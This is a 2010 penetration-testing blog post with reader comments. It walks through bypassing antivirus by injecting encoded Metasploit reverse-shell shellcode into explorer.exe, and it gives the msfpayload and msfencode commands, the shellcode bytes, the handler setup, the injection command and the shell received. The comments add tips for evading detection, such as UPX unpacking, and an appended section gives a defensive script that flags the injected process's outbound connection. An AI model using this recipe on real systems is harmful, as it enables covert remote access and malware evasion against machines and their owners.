Tuesday, August 17, 2010

Bypassing AntiVirus With Process Injection

There is a new antivirus-bypass tool that allows an attacker to inject shellcode into a process post-exploitation, enabling the attacker to pass a shell to a remote location. Generally I assume this would be a meterpreter shell, for obvious reasons. Those of us who penetration test for a living are aware of the need to sometimes have a shell after obtaining GUI system access. Buuuut antivirus can be a real pain in the ass sometimes.


A few people came to me today saying they tried this new technique and it looked awesome but was not functioning correctly. Below is a description of why it was not working for them and how to fix it. Here is a link to the program for reference:

https://sites.google.com/site/mamit30/home/injector

Videos are cool and all, but as we know they tend to leave things out. In this case they left out the proper way to create shellcode, and they also left out how to create the file to inject into the process. So below is a walkthrough, without missing any details, of how to get a shell by injecting into a process with injector. Honestly, I wish people who developed tools would not leave out details in their videos. I also wish they would learn to talk and explain things as they create the video rather than having a distracting song.

Mainly I believe the issues people were having are due to bad characters within their shellcode. (Although I did not verify this in a debugger, the crash behavior leans towards this assumption.)

When you inject a payload into a process, if any characters are bad, such as null characters, the process will automatically terminate or produce undesired results. It doesn't always have to be a null; all processes and programs are created differently, depending on what they are looking for. Encoding is a good way to solve these issues. So let's get to it!!

Original Video: http://vimeo.com/14139105

Issues people had:
-Injecting into Explorer.exe crashes the process... (explorer being a good process because it re-spawns)

Resolution:
-Alpha upper encoding
-using the py file to create raw code


So basically the problem people were having is that there were bad characters in their shellcode that were crashing the process. What follows is a step-by-step on how to use the antivirus bypass technique, which the video does not show clearly and in its entirety.


1. First Create your shell-code: (Alpha upper encode the shellcode, and add a thread exit function)


root@Ficti0n:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 EXITFUNC=thread R | ./msfencode -e x86/alpha_upper

[*] x86/alpha_upper succeeded with size 699 (iteration=1)
buf =
"\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" +
..........
.................

The output from this will be very large, but no worries, size doesn't appear to be an issue.


2. Put this shell-code into the generic.py file like so (remove all + signs and surround the output with parentheses):


buffer=("\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
............
................. )

file=open("pgeneric.txt","w")
file.write(buffer)



3. Start up your multi-handler; after you send the payload you will get a shell. (Go to step 4 below to send off your payload.)

msf > use multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.10:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.3:2438) at Tue Aug 17 20:30:20 -0400 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator> YAY FOR SHELL



4. Check your process list for Explorer.exe, then ship off your payload into the process. This payload is now encoded to remove all bad characters, and with your multi/handler running you should receive a shell no problem.


C:\Documents and Settings\Administrator\Desktop\injector>tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        244 K
smss.exe                     620 Console                 0        388 K
csrss.exe                    668 Console                 0      1,660 K
winlogon.exe                 692 Console                 0      5,152 K
services.exe                 736 Console                 0      4,312 K
lsass.exe                    748 Console                 0      1,544 K
vmacthlp.exe                 904 Console                 0      2,292 K
svchost.exe                  920 Console                 0      4,548 K
svchost.exe                 1000 Console                 0      4,012 K
svchost.exe                 1092 Console                 0     21,824 K
svchost.exe                 1136 Console                 0      3,060 K
svchost.exe                 1212 Console                 0      4,584 K
spoolsv.exe                 1416 Console                 0      5,476 K
sqlservr.exe                1800 Console                 0      8,684 K
sqlwriter.exe               1948 Console                 0      3,268 K
notepad++.exe               2104 Console                 0      3,072 K
notepad.exe                 3612 Console                 0      3,388 K
explorer.exe                1568 Console                 0     22,064 K
tasklist.exe                1900 Console                 0      4,244 K
wmiprvse.exe                2708 Console                 0      5,404 K

C:\Documents and Settings\Administrator\Desktop\injector>injector.exe pgeneric.txt 1568

[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us: http://www.garage4hackers.com


C:\Documents and Settings\Administrator\Desktop\injector> Your payload was just sent!! check your meterpreter


I hope that clears a few things up for anyone who was asking me how to utilize this tool on a pentest. This is an excellent technique and very neat, but explanation of proper payloads and examples was lacking. I would have much preferred a written write-up with more detail for reference, so that is what I am providing.

Final Note:
Also one final note: you will notice I used the "explorer.exe" process. I used explorer.exe because if I blow it up, it will respawn itself. This is also a good technique when migrating processes in Meterpreter: if explorer.exe fubars, you can just kill the process and it will respawn. I have used this technique on processes running as a domain administrator to get full domain access. However, when I blew up the process I lost access, but was able to just respawn it and regain my foothold when no hashes or tokens were available.
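
What the session from steps 3 and 4 looks like from the defending side, as an added example that is not part of the original post or the injector tool: the shellcode runs inside explorer.exe, so the outbound connection shows up under PID 1568, and joining `tasklist` with `netstat -ano` output surfaces it. The netstat rows, the EXPECTED_OUTBOUND baseline and the function names are constructed assumptions.

```python
import re

# Constructed sample data. Tasklist rows are copied from the post; the netstat
# rows are built to match step 3 (192.168.1.3:2438 -> 192.168.1.10:4444).
TASKLIST = """\
svchost.exe                 1092 Console                 0     21,824 K
sqlservr.exe                1800 Console                 0      8,684 K
explorer.exe                1568 Console                 0     22,064 K
"""
NETSTAT = """\
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       1800
  TCP    192.168.1.3:1433       192.168.1.20:51512     ESTABLISHED     1800
  TCP    192.168.1.3:2440       192.168.1.30:80        ESTABLISHED     1092
  TCP    192.168.1.3:2438       192.168.1.10:4444      ESTABLISHED     1568
"""

# Assumption: a per-site baseline of which images may open outbound
# connections, and to which remote ports. Everything else is reported.
EXPECTED_OUTBOUND = {"svchost.exe": {53, 80, 443}}
TASK_ROW = re.compile(r"^(.+?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K$")

def parse_tasklist(text):
    """Map PID -> image name from `tasklist` output rows."""
    pids = {}
    for line in text.splitlines():
        m = TASK_ROW.match(line.strip())
        if m:
            pids[int(m.group(2))] = m.group(1).lower()
    return pids

def suspicious_connections(tasklist_text, netstat_text):
    """Return outbound TCP sessions owned by images outside the baseline."""
    pids = parse_tasklist(tasklist_text)
    rows = [r for r in (line.split() for line in netstat_text.splitlines())
            if len(r) == 5 and r[0] == "TCP"]
    # Local ports with a listener: sessions on them are inbound, not outbound.
    listening = {r[1].rsplit(":", 1)[1] for r in rows if r[3] == "LISTENING"}
    findings = []
    for _, local, remote, state, pid in rows:
        if state != "ESTABLISHED" or local.rsplit(":", 1)[1] in listening:
            continue
        image = pids.get(int(pid), "<unknown>")
        if int(remote.rsplit(":", 1)[1]) not in EXPECTED_OUTBOUND.get(image, set()):
            findings.append((image, int(pid), local, remote))
    return findings

if __name__ == "__main__":
    for image, pid, local, remote in suspicious_connections(TASKLIST, NETSTAT):
        print(f"review: {image} (PID {pid}) {local} -> {remote}")
```

The inbound SQL Server session and the baselined svchost.exe connection are skipped; only the explorer.exe session to port 4444 is reported.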




7 comments:

  1. Silly question, doesn't the AV detect your injection attempt before you can run any shellcode?

  2. I think the only way this would get detected by AV is if the injector program itself started being flagged by Antivirus, which is a pretty good likelihood in the future.
    The shellcode itself shouldn't flag anything because you are injecting it into a running process in memory, and I don't believe the shellcode would flag AV anyway on its own in a txt file... Anyone can feel free to correct me if I am wrong... But I believe that is correct.

    So I just tossed the shellcode file in VirusTotal and there are no hits, so the shellcode file should be safe from AV. I then threw up the injector program on to VirusTotal and 9 AVs out of 42 flagged it. Neither McAfee nor Symantec saw it, which are the 2 big ones I am usually up against; a few others of note found it, Kaspersky and Avast.

    Does that answer the question?

  3. It has still failed. When I run it kills the process and the shellcode doesn't work :(

  4. Hmmm, that's the issue I was having before encoding. Are you making sure to encode your shellcode and use the python script to create the file out of the shellcode? If so, what encoding are you using?? Try alpha upper.

  5. As you uploaded the injector to VirusTotal, it will be detected by most AV in a short amount of time. ;)
    Kaspersky detects it since 08/11/2010 as Trojan.Win32.Vaklik.ikj.

  6. Do you really think that AV can detect this tool? I mean, this tool only uses legitimate APIs; if they release a signature for this, then it will create BIG false positives with Windows applications. I discussed the same AV detection issue with the author, but he was saying that it is not possible to release a signature for Injector; however, AV may release signatures of hard-coded strings in Injector. But this is not the solution. AV detects it because it is UPX packed (exactly why, I don't know), but the author told me to just unpack the file with UPX, and it is working cool now. I also discussed the shellcode issue with the author; he said to use "wb" instead of "w" in the generic.py script (in fact this is not a txt file; the file is actually a bin file generated from generic.py, he said). Although these things do not affect the working of injector, and we can use any shellcode and any encoder; this is also verified by me.

    /
    lx

